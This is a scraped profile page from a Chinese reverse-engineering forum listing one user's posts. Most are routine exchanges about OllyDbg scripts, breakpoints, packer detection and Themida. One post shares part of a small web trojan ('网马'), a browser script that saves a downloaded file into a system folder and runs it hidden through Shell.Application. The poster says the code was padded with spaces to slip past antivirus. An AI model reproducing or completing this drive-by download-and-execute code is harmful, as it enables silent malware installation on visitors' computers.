|
[求助]请问无法设置消息断点的问题,如何解决?
这时可以用消息API的方法来下断点,这方面的教程有不少,这里就不说了. |
|
[分享]一个800字节左右的网马
第二部分,主要是不被杀软直接杀了 var F=d f.C r e a t e O b j e c t("Scripting.F i l e S y s t e mObject",""); var tmp=F.Get Special Folder(0); -------------------------------------------------- fname1= F.Build Path (t m p, fname1); S.Open(); S.Write(x.responseBody); S.SaveToFile(fname1,2); S.Close(); var Q=df.CreateObject("Shell.Application",""); Q.Shell Execu te(fname1,"","","open",0); } catch (i) {i=1;} </script></head></html> 为了能上传,一直被杀软查出呢 同时在文件中加了大量的空格.但是应该不影响看清楚吧. |
|
[推荐]据说是目前最好的反编译工具,1999美元。
就是,有人用过吗? |
|
[讨论]PEID查壳不到的壳
其实用peid查不到壳也说明加了壳了,只不过是未知名的壳吧.反而是那些查出壳名的未必就是真的壳名,因为做假壳名也是一种保护手段. |
|
[求助]如何在OD中得到虚函数调用的API
哇,终于有人回帖了,谢谢笨笨雄. 其实很简单,第一次试时,是在407138处中断,因为这时OD已经看到了提示信息 这时我用一个最简单的脚本 bc eip gapi eip msg $RESULT ret 这时因为EIP=407138 对应的汇编语句是 00407138 . FF50 1C call dword ptr [eax+1C] ; kernel32.GlobalAlloc 最右边的kernel32.GlobalAlloc只有在运行到这句时才可以在OD中出现, 但是我用上面的脚本得不到"kernel32.GlobalAlloc"这个提示 我上传一个附件,里面有试验用的脚本和一个加petite23壳的VC6自动生成的一个程序 版主也可以用petite23自己加个程序试试.附件的脚本是 cmp $VERSION, "1.52" //比较是否大于 1.52版 ja version_above_152 ret version_above_152: var x findcmd 407000, "call dword ptr[eax+1C]" mov x,$RESULT cmp x,0 je EXIT_LABLE bp x ai bc eip gapi eip msg $RESULT EXIT_LABLE: ret 麻烦版主看看,谢谢! |
|
[求助]谁有流氓软件专业查杀工具
好象瑞星卡卡可以杀,免费的. |
|
[求助]OllyDbg 的问题
不要叫我老师,我也是菜鸟 在push xx处用jmp跳到一个可以增加代码的地方 push xx后再用jmp 跳回call处,不知道行不行. 如果还不行就 push yy 然后用esp寄存器再改回xx,可以加点算法,再跳回call这样应该可以了. (特征码?我心里有点发毛,不会是害人的东东吧) |
|
[求助]如何在OD中得到虚函数调用的API
没人答我,看来要好好学学再来提问了 |
|
[求助]OllyDbg 的问题
push 是写数据入堆栈的 比如下面 push 1 push 14 push 0 call GlobalAlloc mov ecx,eax 如果你改了那个push 14 那个call GlobalAlloc 就会取堆栈中push 0边的那个push 1来当做push 14来用,这个打乱了堆栈了, 所以会引出未知的错误 |
|
[求助]关于设置断点的问题
看OD的中文帮助吧,消息断点在OD是比较好设置的. |
|
[求助]thmida壳,peid查不出来,加载调试又出现问题
themida的壳不用PEid查就知道,用VC的调试器加它就可以在调试信息处看到明文告诉你是themida加的壳了. |
|
[讨论]居然在图书馆借到<加密与解密>
当看明白后再看时最高效 |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值